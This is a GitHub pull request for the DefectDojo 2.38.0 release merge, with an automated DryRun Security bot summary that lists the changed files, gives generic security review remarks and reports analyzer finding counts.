Release: Merge release into master from: release/2.38.0

[github-actions]

Release triggered by Maffooch

[dryrunsecurity]

DryRun Security Summary

The provided GitHub Pull Request includes a variety of changes across multiple files in the DefectDojo application, covering documentation updates, dependency version updates, configuration changes, and updates to the core application code, with a few areas that deserve closer attention for potential security implications, such as input validation, access control, secure communication, logging and monitoring, and the need for regular security assessments.

Expand for full summary

Summary:

The provided GitHub Pull Request includes a variety of changes across multiple files in the DefectDojo application. The changes cover a wide range of functionality, including documentation updates, dependency version updates, configuration changes, and updates to the core application code.

From an application security perspective, the changes do not introduce any obvious security vulnerabilities. However, there are a few areas that deserve closer attention:

1. Input Validation and Sanitization: Ensure that all user-provided input is properly validated and sanitized to prevent common web application vulnerabilities, such as SQL injection, cross-site scripting (XSS), and others.
2. Access Control and Authorization: Verify that the user permissions and access controls are properly implemented, ensuring that users can only access the data and functionality they are authorized to.
3. Secure Communication: Ensure that the application uses secure communication protocols (e.g., HTTPS) to protect sensitive data during transit.
4. Logging and Monitoring: Verify that the application has robust logging and monitoring mechanisms in place to detect and respond to security incidents.
5. Regular Security Assessments: Conduct regular security assessments, such as penetration testing and code reviews, to identify and address any potential security vulnerabilities in the application.

Files Changed:

1. README.md: Minor update to the "Hall of Fame" section, which does not introduce any security concerns.
2. components/package.json: Update to the DefectDojo application version and a dependency version update, which should be reviewed for any known security vulnerabilities.
3. components/yarn.lock: Update to the pdfmake library version, which should be reviewed for any security-related changes.
4. docker-compose.override.dev.yml: Changes to the development environment configuration, including the use of administrative credentials and debugging features, which should be properly addressed before deploying to production.
5. Dockerfile.integration-tests-debian: Updates to the base image and dependencies, which should be reviewed for any known security vulnerabilities.
6. NOTICE: Documentation update, which does not introduce any security concerns.
7. docs/content/en/contributing/documentation.md: Documentation update, which does not introduce any security concerns.
8. docker/install_chrome_dependencies.py: Script to install Chrome dependencies, which should be reviewed for potential command injection vulnerabilities and proper error handling.
9. docker-compose.yml: Update to the PostgreSQL Docker image version, which should be reviewed for any security-related changes.
10. docker/setEnv.sh: Script to manage the Docker environment configuration, which appears to be a routine maintenance update.
11. docs/content/en/getting_started/upgrading/2.38.md: Documentation update for the HELM deployment configuration, which does not introduce any security concerns.
12. docs/content/en/integrations/parsers/file/blackduck_binary_analysis.md: Documentation update, which does not introduce any security concerns.
13. docs/content/en/contributing/how-to-write-a-parser.md: Documentation update, which highlights some important security practices for contributing parsers.
14. docs/package-lock.json: Update to the postcss package version, which should be reviewed for any security-related changes.
15. docs/package.json: Update to the postcss package version, which should be reviewed for any security-related changes.
16. dojo/__init__.py: Update to the DefectDojo application version, which should be reviewed for any security-related changes.
17. dojo/api_v2/views.py: Refactoring of the API views, which should be reviewed for any potential security implications.
18. dojo/apps.py: Changes to the application initialization and configuration, including the setup of Watson search indexing, which should be reviewed for any potential security implications.
19. dojo/api_v2/serializers.py: Updates to the serializers, including improvements to validation and JIRA integration, which should be reviewed for any security-related changes.
20. dojo/engagement/services.py: Changes to the engagement closing and reopening functionality, which should be reviewed for any potential security implications.
21. dojo/engagement/signals.py: Changes to the engagement-related signal handlers, which do not appear to introduce any security concerns.
22. dojo/engagement/views.py: Updates to the engagement management functionality, including the handling of credential mappings, which should be reviewed for any security-related changes.
    23

Code Analysis

We ran 9 analyzers against 30 files and 2 analyzers had findings. 7 analyzers had no findings.

Analyzer	Findings
Sensitive Files Analyzer	3 findings
Authn/Authz Analyzer	4 findings

Riskiness

🟢 Risk threshold not exceeded.

View PR in the DryRun Dashboard.